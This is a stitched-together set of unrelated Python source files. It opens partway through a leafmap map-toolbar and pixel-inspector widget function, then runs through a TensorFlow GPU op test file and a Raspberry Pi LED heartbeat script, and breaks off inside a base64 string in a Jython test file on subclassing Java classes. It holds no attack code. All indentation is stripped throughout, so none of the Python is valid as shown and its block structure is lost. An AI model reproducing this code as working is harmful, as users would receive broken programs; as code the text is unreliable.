layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
int_slider_label = widgets.Label()
widgets.jslink((int_slider, "value"), (int_slider_label, "value"))
float_slider = widgets.FloatSlider(
min=1,
max=100,
description="Float Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
float_slider_label = widgets.Label()
widgets.jslink((float_slider, "value"), (float_slider_label, "value"))
color = widgets.ColorPicker(
concise=False,
description="Color:",
value="white",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
text = widgets.Text(
value="",
description="Textbox:",
placeholder="Placeholder",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
textarea = widgets.Textarea(
placeholder="Placeholder",
layout=widgets.Layout(width=widget_width),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
buttons.style.button_padding = "0px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
widgets.HBox([int_slider, int_slider_label]),
widgets.HBox([float_slider, float_slider_label]),
dropdown,
text,
color,
textarea,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Apply":
with output:
output.clear_output()
print("Running ...")
elif change["new"] == "Reset":
textarea.value = ""
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
def inspector_gui(m=None):
"""Generates a tool GUI template using ipywidgets.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
import pandas as pd
widget_width = "250px"
padding = "0px 5px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
if m is not None:
marker_cluster = ipyleaflet.MarkerCluster(name="Inspector Markers")
setattr(m, "pixel_values", [])
setattr(m, "marker_cluster", marker_cluster)
if not hasattr(m, "interact_mode"):
setattr(m, "interact_mode", False)
if not hasattr(m, "inspector_output"):
inspector_output = widgets.Output(
layout=widgets.Layout(width=widget_width, padding="0px 5px 5px 5px")
)
setattr(m, "inspector_output", inspector_output)
output = m.inspector_output
output.clear_output()
if not hasattr(m, "inspector_add_marker"):
inspector_add_marker = widgets.Checkbox(
description="Add Marker at clicked location",
value=True,
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
setattr(m, "inspector_add_marker", inspector_add_marker)
add_marker = m.inspector_add_marker
if not hasattr(m, "inspector_bands_chk"):
inspector_bands_chk = widgets.Checkbox(
description="Get pixel value for visible bands only",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
setattr(m, "inspector_bands_chk", inspector_bands_chk)
bands_chk = m.inspector_bands_chk
if not hasattr(m, "inspector_class_label"):
inspector_label = widgets.Text(
value="",
description="Class label:",
placeholder="Add a label to the marker",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
setattr(m, "inspector_class_label", inspector_label)
label = m.inspector_class_label
options = []
if hasattr(m, "cog_layer_dict"):
options = list(m.cog_layer_dict.keys())
if len(options) == 0:
default_option = None
else:
default_option = options[0]
if not hasattr(m, "inspector_dropdown"):
inspector_dropdown = widgets.Dropdown(
options=options,
value=default_option,
description="Select a layer:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
setattr(m, "inspector_dropdown", inspector_dropdown)
dropdown = m.inspector_dropdown
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Download", "Reset", "Close"],
tooltips=["Download", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
if len(options) == 0:
with output:
print("No COG/STAC layers available")
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
add_marker,
label,
dropdown,
bands_chk,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def chk_change(change):
if hasattr(m, "pixel_values"):
m.pixel_values = []
if hasattr(m, "marker_cluster"):
m.marker_cluster.markers = []
output.clear_output()
bands_chk.observe(chk_change, "value")
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
if hasattr(m, "inspector_mode"):
delattr(m, "inspector_mode")
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
m.default_style = {"cursor": "default"}
m.marker_cluster.markers = []
m.pixel_values = []
marker_cluster_layer = m.find_layer("Inspector Markers")
if marker_cluster_layer is not None:
m.remove_layer(marker_cluster_layer)
if hasattr(m, "pixel_values"):
delattr(m, "pixel_values")
if hasattr(m, "marker_cluster"):
delattr(m, "marker_cluster")
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Download":
with output:
output.clear_output()
if len(m.pixel_values) == 0:
print(
"No pixel values available. Click on the map to start collection data."
)
else:
print("Downloading pixel values...")
df = pd.DataFrame(m.pixel_values)
temp_csv = temp_file_path("csv")
df.to_csv(temp_csv, index=False)
link = create_download_link(temp_csv)
with output:
output.clear_output()
display(link)
elif change["new"] == "Reset":
label.value = ""
output.clear_output()
if hasattr(m, "pixel_values"):
m.pixel_values = []
if hasattr(m, "marker_cluster"):
m.marker_cluster.markers = []
elif change["new"] == "Close":
if m is not None:
if hasattr(m, "inspector_mode"):
delattr(m, "inspector_mode")
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
m.default_style = {"cursor": "default"}
m.marker_cluster.markers = []
marker_cluster_layer = m.find_layer("Inspector Markers")
if marker_cluster_layer is not None:
m.remove_layer(marker_cluster_layer)
m.pixel_values = []
if hasattr(m, "pixel_values"):
delattr(m, "pixel_values")
if hasattr(m, "marker_cluster"):
delattr(m, "marker_cluster")
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
lat = round(latlon[0], 4)
lon = round(latlon[1], 4)
if (
kwargs.get("type") == "click"
and hasattr(m, "inspector_mode")
and m.inspector_mode
):
m.default_style = {"cursor": "wait"}
with output:
output.clear_output()
print("Getting pixel value ...")
layer_dict = m.cog_layer_dict[dropdown.value]
if layer_dict["type"] == "STAC":
if bands_chk.value:
assets = layer_dict["assets"]
else:
assets = None
result = stac_pixel_value(
lon,
lat,
layer_dict["url"],
layer_dict["collection"],
layer_dict["items"],
assets,
layer_dict["titiler_endpoint"],
verbose=False,
)
if result is not None:
with output:
output.clear_output()
print(f"lat/lon: {lat:.4f}, {lon:.4f}\n")
for key in result:
print(f"{key}: {result[key]}")
result["latitude"] = lat
result["longitude"] = lon
result["label"] = label.value
m.pixel_values.append(result)
if add_marker.value:
markers = list(m.marker_cluster.markers)
markers.append(ipyleaflet.Marker(location=latlon))
m.marker_cluster.markers = markers
else:
with output:
output.clear_output()
print("No pixel value available")
elif layer_dict["type"] == "COG":
result = cog_pixel_value(lon, lat, layer_dict["url"], verbose=False)
if result is not None:
with output:
output.clear_output()
print(f"lat/lon: {lat:.4f}, {lon:.4f}\n")
for key in result:
print(f"{key}: {result[key]}")
result["latitude"] = lat
result["longitude"] = lon
result["label"] = label.value
m.pixel_values.append(result)
if add_marker.value:
markers = list(m.marker_cluster.markers)
markers.append(ipyleaflet.Marker(location=latlon))
m.marker_cluster.markers = markers
else:
with output:
output.clear_output()
print("No pixel value available")
m.default_style = {"cursor": "crosshair"}
if m is not None:
if not hasattr(m, "marker_cluster"):
setattr(m, "marker_cluster", marker_cluster)
m.add_layer(marker_cluster)
if not m.interact_mode:
m.on_interaction(handle_interaction)
m.interact_mode = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
if not hasattr(m, "inspector_mode"):
if hasattr(m, "cog_layer_dict"):
setattr(m, "inspector_mode", True)
else:
setattr(m, "inspector_mode", False)
else:
return toolbar_widget
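# Illustrative sketch (hypothetical URL and method name). inspector_gui(m) only offers
# layers listed in m.cog_layer_dict, which is assumed to be populated by calls such as
# m.add_cog_layer(). After the call, clicking the map triggers cog_pixel_value() /
# stac_pixel_value() and appends each result to m.pixel_values.
def _example_inspector(m):
    m.add_cog_layer("https://example.com/demo.tif", name="Demo COG")  # placeholder URL
    inspector_gui(m)  # click the map to collect values; "Download" exports them as CSV
    return m.pixel_values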
|
basic_gpu_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for basic component wise operations using a GPU device."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.gen_array_ops import _broadcast_gradient_args
from tensorflow.python.platform import test
class GPUBinaryOpsTest(test.TestCase):
def _compareGPU(self, x, y, np_func, tf_func):
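# Run the same binary op in a GPU session and a CPU session and check the results agree.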
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = sess.run(out)
with self.test_session(use_gpu=False) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_cpu = sess.run(out)
self.assertAllClose(tf_cpu, tf_gpu)
def testFloatBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float32)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
self._compareGPU(x, y + 0.1, np.floor_divide, math_ops.floordiv)
self._compareGPU(x, y, np.power, math_ops.pow)
def testFloatWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float32)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float32)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleBasic(self):
x = np.linspace(-5, 20, 15).reshape(1, 3, 5).astype(np.float64)
y = np.linspace(20, -5, 15).reshape(1, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
def testDoubleWithBCast(self):
x = np.linspace(-5, 20, 15).reshape(3, 5).astype(np.float64)
y = np.linspace(20, -5, 30).reshape(2, 3, 5).astype(np.float64)
self._compareGPU(x, y, np.add, math_ops.add)
self._compareGPU(x, y, np.subtract, math_ops.subtract)
self._compareGPU(x, y, np.multiply, math_ops.multiply)
self._compareGPU(x, y + 0.1, np.true_divide, math_ops.truediv)
class MathBuiltinUnaryTest(test.TestCase):
def _compare(self, x, np_func, tf_func, use_gpu):
np_out = np_func(x)
with self.test_session(use_gpu=use_gpu) as sess:
inx = ops.convert_to_tensor(x)
ofunc = tf_func(inx)
tf_out = sess.run(ofunc)
self.assertAllClose(np_out, tf_out)
def _inv(self, x):
return 1.0 / x
def _rsqrt(self, x):
return self._inv(np.sqrt(x))
def _testDtype(self, dtype, use_gpu):
data = (np.arange(-3, 3) / 4.).reshape([1, 3, 2]).astype(dtype)
data_gt_1 = data + 2 # for x > 1
self._compare(data, np.abs, math_ops.abs, use_gpu)
self._compare(data, np.arccos, math_ops.acos, use_gpu)
self._compare(data, np.arcsin, math_ops.asin, use_gpu)
self._compare(data, np.arcsinh, math_ops.asinh, use_gpu)
self._compare(data_gt_1, np.arccosh, math_ops.acosh, use_gpu)
self._compare(data, np.arctan, math_ops.atan, use_gpu)
self._compare(data, np.ceil, math_ops.ceil, use_gpu)
self._compare(data, np.cos, math_ops.cos, use_gpu)
self._compare(data, np.cosh, math_ops.cosh, use_gpu)
self._compare(data, np.exp, math_ops.exp, use_gpu)
self._compare(data, np.floor, math_ops.floor, use_gpu)
self._compare(data, np.log, math_ops.log, use_gpu)
self._compare(data, np.log1p, math_ops.log1p, use_gpu)
self._compare(data, np.negative, math_ops.negative, use_gpu)
self._compare(data, self._rsqrt, math_ops.rsqrt, use_gpu)
self._compare(data, np.sin, math_ops.sin, use_gpu)
self._compare(data, np.sinh, math_ops.sinh, use_gpu)
self._compare(data, np.sqrt, math_ops.sqrt, use_gpu)
self._compare(data, np.square, math_ops.square, use_gpu)
self._compare(data, np.tan, math_ops.tan, use_gpu)
self._compare(data, np.tanh, math_ops.tanh, use_gpu)
self._compare(data, np.arctanh, math_ops.atanh, use_gpu)
def testTypes(self):
for dtype in [np.float32]:
self._testDtype(dtype, use_gpu=True)
def testFloorDivide(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
np_out = np.floor_divide(x, y + 0.1)
with self.test_session(use_gpu=True) as sess:
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y + 0.1)
ofunc = inx / iny
out_func2 = math_ops.floor(ofunc)
tf_out = sess.run(out_func2)
self.assertAllClose(np_out, tf_out)
class BroadcastSimpleTest(test.TestCase):
def _GetGradientArgs(self, xs, ys):
with self.test_session(use_gpu=True) as sess:
return sess.run(_broadcast_gradient_args(xs, ys))
def testBroadcast(self):
r0, r1 = self._GetGradientArgs([2, 3, 5], [1])
self.assertAllEqual(r0, [])
self.assertAllEqual(r1, [0, 1, 2])
_GRAD_TOL = {dtypes.float32: 1e-3}
def _compareGradientX(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
xs = list(x.shape)
jacob_t, jacob_n = gradient_checker.compute_gradient(
inx, xs, out, zs, x_init_value=x)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGradientY(self,
x,
y,
np_func,
tf_func,
numeric_gradient_type=None):
z = np_func(x, y)
zs = list(z.shape)
with self.test_session():
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
if x.dtype in (np.float32, np.float64):
out = 1.1 * tf_func(inx, iny)
else:
out = tf_func(inx, iny)
ys = list(np.shape(y))
jacob_t, jacob_n = gradient_checker.compute_gradient(
iny, ys, out, zs, x_init_value=y)
tol = self._GRAD_TOL[dtypes.as_dtype(x.dtype)]
self.assertAllClose(jacob_t, jacob_n, rtol=tol, atol=tol)
def _compareGpu(self, x, y, np_func, tf_func):
np_ans = np_func(x, y)
with self.test_session(use_gpu=True):
inx = ops.convert_to_tensor(x)
iny = ops.convert_to_tensor(y)
out = tf_func(inx, iny)
tf_gpu = out.eval()
self.assertAllClose(np_ans, tf_gpu)
self.assertShapeEqual(np_ans, out)
# TODO (zhifengc/ke): make gradient checker work on GPU. id:2794 gh:2795
def testGradient(self):
x = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
y = (1 + np.linspace(0, 5, np.prod([1, 3, 2]))).astype(np.float32).reshape(
[1, 3, 2])
self._compareGradientX(x, y, np.true_divide, math_ops.truediv)
self._compareGradientY(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y, np.true_divide, math_ops.truediv)
self._compareGpu(x, y + 0.1, np.floor_divide, math_ops.floordiv)
class GpuMultiSessionMemoryTest(test_util.TensorFlowTestCase):
"""Tests concurrent sessions executing on the same GPU."""
def _run_session(self, session, results):
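# Run a deterministic chain of matmuls many times in one session and record every
# distinct result; the calling test expects all sessions to produce a single value.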
n_iterations = 500
with session as s:
data = variables.Variable(1.0)
with ops.device('/device:GPU:0'):
random_seed.set_random_seed(1)
matrix1 = variables.Variable(
random_ops.truncated_normal([1024, 1]), name='matrix1')
matrix2 = variables.Variable(
random_ops.truncated_normal([1, 1024]), name='matrix2')
x1 = math_ops.multiply(data, matrix1, name='x1')
x3 = math_ops.matmul(x1, math_ops.matmul(matrix2, matrix1))
x4 = math_ops.matmul(array_ops.transpose(x3), x3, name='x4')
s.run(variables.global_variables_initializer())
for _ in xrange(n_iterations):
value = s.run(x4)
results.add(value.flat[0])
if len(results) != 1:
break
def testConcurrentSessions(self):
n_threads = 4
threads = []
results = []
for _ in xrange(n_threads):
session = self.test_session(graph=ops.Graph(), use_gpu=True)
results.append(set())
args = (session, results[-1])
threads.append(threading.Thread(target=self._run_session, args=args))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
flat_results = set([x for x in itertools.chain(*results)])
self.assertEqual(1,
len(flat_results),
'Expected single value, got %r' % flat_results)
if __name__ == '__main__':
test.main()
|
heart.py
|
"""
Drives a ring of WS281x LEDs to simulate a heartbeat.
A background thread owns the LED strip: it pulses the strip at the configured BPM
and fades between colors. The pink()/red()/blue() methods set the next color and
normal()/sleeping()/excited() set the rate; changes are picked up on the next beat,
so callers never block on the hardware.
"""
import sys
import time
import threading
from rpi_ws281x import PixelStrip
PINK = (168, 50, 105)
RED = (255, 0, 0)
BLUE = (0, 0, 128)
BLACK = (0, 0, 0)
BPM_NORMAL = 60
BPM_SLEEPING = 40
BPM_EXCITED = 110
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 12 # GPIO pin connected to the pixels (18 uses PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
# True to invert the signal (when using NPN transistor level shift)
LED_INVERT = False
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
class Heart:
thread = None
color = BLACK # color currently shown on the strip
next_color = PINK
bpm = 60
strip = None
def __init__(self):
if Heart.strip is None:
Heart.strip = PixelStrip(
LED_COUNT,
LED_PIN,
LED_FREQ_HZ,
LED_DMA,
LED_INVERT,
LED_BRIGHTNESS,
LED_CHANNEL
)
Heart.strip.begin()
if Heart.thread is None:
Heart.thread = threading.Thread(target=self._thread)
Heart.thread.start()
def pink(self):
Heart.next_color = PINK
return self
def red(self):
Heart.next_color = RED
return self
def blue(self):
Heart.next_color = BLUE
return self
def normal(self):
Heart.bpm = BPM_NORMAL
return self
def sleeping(self):
Heart.bpm = BPM_SLEEPING
return self
def excited(self):
Heart.bpm = BPM_EXCITED
return self
@classmethod
def _thread(cls):
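# Beat loop: pulse the strip twice per beat (flash, brief off, second flash), then
# fade to black for the rest of the beat; color/BPM changes made by the setters are
# picked up at the top of each iteration.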
cls.started_at = time.time()
while True:
bps = cls.bpm / 60
if cls.next_color != cls.color:
cls.fadeTo(cls.next_color, 40, 1)
cls.color = cls.next_color
# simulate heartbeat
cls.fill(cls.color) # first pulse of the beat
time.sleep(.25 / bps)
cls.fill(BLACK)
time.sleep(.1 / bps)
cls.fill(cls.color)
cls.fadeTo(BLACK, 20, .6 / bps)
@classmethod
def fill(cls, rgb):
(r, g, b) = rgb
for i in range(cls.strip.numPixels()):
cls.strip.setPixelColorRGB(i, r, g, b, 255)
cls.strip.show()
# fade from current color to rgb
@classmethod
def fadeTo(cls, rgb, steps, duration):
(r1, g1, b1) = cls.color
(r2, g2, b2) = rgb
r_inc = (r1 - r2) / steps
g_inc = (g1 - g2) / steps
b_inc = (b1 - b2) / steps
r = r1
g = g1
b = b1
for i in range(steps):
r -= r_inc
g -= g_inc
b -= b_inc
cls.fill((int(r), int(g), int(b)))
time.sleep(duration / steps)
if __name__ == '__main__':
heart = Heart()
while 1:
time.sleep(1)
|
test_java_subclasses.py
|
'''Tests subclassing Java classes in Python'''
import os
import sys
import threading
import unittest
from test import test_support
from java.lang import (Boolean, Class, ClassLoader, Comparable, Integer, Object, Runnable, String,
Thread, ThreadGroup, InterruptedException, UnsupportedOperationException)
from java.util import AbstractList, ArrayList, Date, Hashtable, HashSet, Vector
from java.util.concurrent import Callable, Executors
from java.awt import Color, Component, Dimension, Rectangle
from javax.swing import ComboBoxModel, ListModel
from javax.swing.table import AbstractTableModel
from javax.swing.tree import DefaultTreeModel, DefaultMutableTreeNode
from org.python.tests import BeanInterface, Callbacker, Coercions, OwnMethodCaller
from javatests import (
InheritanceA, InheritanceB, InheritanceC, InheritanceD,
ExtendedInterface, UseExtendedInterface)
class InterfaceTest(unittest.TestCase):
def test_java_calling_python_interface_implementation(self):
called = []
class PyCallback(Callbacker.Callback):
def call(self, extraarg=None):
called.append(extraarg)
Callbacker.callNoArg(PyCallback())
Callbacker.callOneArg(PyCallback(), 4294967295L)
self.assertEquals(None, called[0])
self.assertEquals(4294967295L, called[1])
class PyBadCallback(Callbacker.Callback):
def call(pyself, extraarg):
self.fail("Shouldn't be callable with a no args")
self.assertRaises(TypeError, Callbacker.callNoArg, PyBadCallback())
def test_inheriting_from_python_and_java_interface(self):
calls = []
class Runner(Runnable):
def run(self):
calls.append("Runner.run")
class ComparableRunner(Comparable, Runner):
def compareTo(self, other):
calls.append("ComparableRunner.compareTo")
return 0
c = ComparableRunner()
c.compareTo(None)
c.run()
self.assertEquals(calls, ["ComparableRunner.compareTo", "Runner.run"])
def test_inherit_interface_twice(self):
# http://bugs.jython.org/issue1504
class A(ListModel): pass
class B(A, ComboBoxModel): pass
# Regression caused B's proxy to occur in B's mro twice. That
# caused the declaration of C to fail with an inconsistent mro
class C(B): pass
class TableModelTest(unittest.TestCase):
def test_class_coercion(self):
'''Python type instances coerce to a corresponding Java wrapper type in Object.getClass'''
class TableModel(AbstractTableModel):
columnNames = "First Name", "Last Name","Sport","# of Years","Vegetarian"
data = [("Mary", "Campione", "Snowboarding", 5, False)]
def getColumnCount(self):
return len(self.columnNames)
def getRowCount(self):
return len(self.data)
def getColumnName(self, col):
return self.columnNames[col]
def getValueAt(self, row, col):
return self.data[row][col]
def getColumnClass(self, c):
return Object.getClass(self.getValueAt(0, c))
def isCellEditable(self, row, col):
return col >= 2
model = TableModel()
for i, expectedClass in enumerate([String, String, String, Integer, Boolean]):
self.assertEquals(expectedClass, model.getColumnClass(i))
class AutoSuperTest(unittest.TestCase):
def test_auto_super(self):
class Implicit(Rectangle):
def __init__(self):
self.size = Dimension(6, 7)
class Explicit(Rectangle):
def __init__(self):
Rectangle.__init__(self, 6, 7)
self.assert_("width=6,height=7" in Implicit().toString())
self.assert_("width=6,height=7" in Explicit().toString())
def test_no_default_constructor(self):
"Check autocreation when java superclass misses a default constructor."
class A(ThreadGroup):
def __init__(self):
print self.name
self.assertRaises(TypeError, A)
# The no-arg constructor for proxies attempts to look up its Python class by the Python class' name,
# so the class needs to be visible at the module level or the import will fail
class ModuleVisibleJavaSubclass(Object):
pass
class PythonSubclassesTest(unittest.TestCase):
def test_multiple_inheritance_prohibited(self):
try:
class MultiJava(Dimension, Color):
pass
self.fail("Shouldn't be able to subclass more than one concrete java class")
except TypeError:
pass
class PyDim(Dimension):
pass
class PyDimRun(PyDim, Runnable):
pass
try:
class PyDimRunCol(PyDimRun, Color):
pass
self.fail("Shouldn't be able to subclass more than one concrete java class")
except TypeError:
pass
def test_multilevel_override(self):
runs = []
class SubDate(Date):
def run(self):
runs.append("SubDate")
def method(self):
return "SubDateMethod"
def toString(self):
s = Date.toString(self)
return 'SubDate -> Date'
class SubSubDate(SubDate, Runnable):
def toString(self):
return 'SubSubDate -> ' + SubDate.toString(self)
self.assertEquals("SubDate -> Date", SubDate().toString())
self.assertEquals("SubSubDate -> SubDate -> Date", SubSubDate().toString())
self.assertEquals("SubDateMethod", SubSubDate().method())
Coercions.runRunnable(SubSubDate())
self.assertEquals(["SubDate"], runs)
def test_passthrough(self):
class CallbackPassthrough(Callbacker.Callback):
def __init__(self, worker):
self.worker = worker
def __getattribute__(self, name):
if name == 'call':
return getattr(self.worker, name)
return object.__getattribute__(self, name)
collector = Callbacker.CollectingCallback()
c = CallbackPassthrough(collector)
Callbacker.callNoArg(c)
self.assertEquals("call()", collector.calls[0])
c.call(7)
self.assertEquals("call(7)", collector.calls[1])
def test_Class_newInstance_works_on_proxies(self):
Class.newInstance(ModuleVisibleJavaSubclass)
def test_override(self):
class Foo(Runnable):
def toString(self): return "Foo"
self.assertEquals(String.valueOf(Foo()), "Foo", "toString not overridden in interface")
class A(Object):
def toString(self):
return 'name'
self.assertEquals('name', String.valueOf(A()), 'toString not overridden in subclass')
def test_can_subclass_abstract(self):
class A(Component):
pass
A()
def test_return_proxy(self):
"Jython proxies properly return back from Java code"
class FooVector(Vector):
bar = 99
ht = Hashtable()
fv = FooVector()
ht.put("a", fv)
self.failUnless(fv is ht.get("a"))
def test_proxy_generates_protected_methods(self):
"""Jython proxies should generate methods for protected methods on their superclasses
Tests for bug #416871"""
output = []
class RegularBean(BeanInterface):
def __init__(self):
output.append("init")
def getName(self):
output.append("getName")
class FinalizingBean(RegularBean):
def finalize(self):
pass
def clone(self):
return self.__class__()
for a in FinalizingBean(), RegularBean():
self.assertEquals("init", output.pop())
a.getName()
self.assertEquals("getName", output.pop())
aa = a.clone()
if isinstance(a, FinalizingBean):
self.assertEquals("init", output.pop())
aa.name
self.assertEquals("getName", output.pop())
def test_python_subclass_of_python_subclass_of_java_class_overriding(self):
'''Test for http://bugs.jython.org/issue1297.
Checks that getValue on SecondSubclass is overridden correctly when called from Java.'''
class FirstSubclass(OwnMethodCaller):
pass
class SecondSubclass(FirstSubclass):
def getValue(self):
return 10
self.assertEquals(10, SecondSubclass().callGetValue())
def test_deep_subclasses(self):
'''Checks for http://bugs.jython.org/issue1363.
Inheriting several classes deep from a Java class caused inconsistent MROs.'''
class A(Object): pass
class B(A): pass
class C(B): pass
class D(C): pass
d = D()
"""
public abstract class Abstract {
public Abstract() {
method();
}
public abstract void method();
}
"""
# The following is the corresponding bytecode for Abstract compiled with javac 1.5
ABSTRACT_CLASS = """\
eJw1TrsKwkAQnI1nEmMe/oKdSaHYiyCClWih2F+SQyOaQDz9LxsFCz/AjxL3Am6xw8zs7O7n+3oD
GKPnQcD30ELgIHQQEexJURZ6SmgN4h1BzKtcEaJlUarV9ZyqeivTEyv2WelDlRO8TXWtM7UojBrM
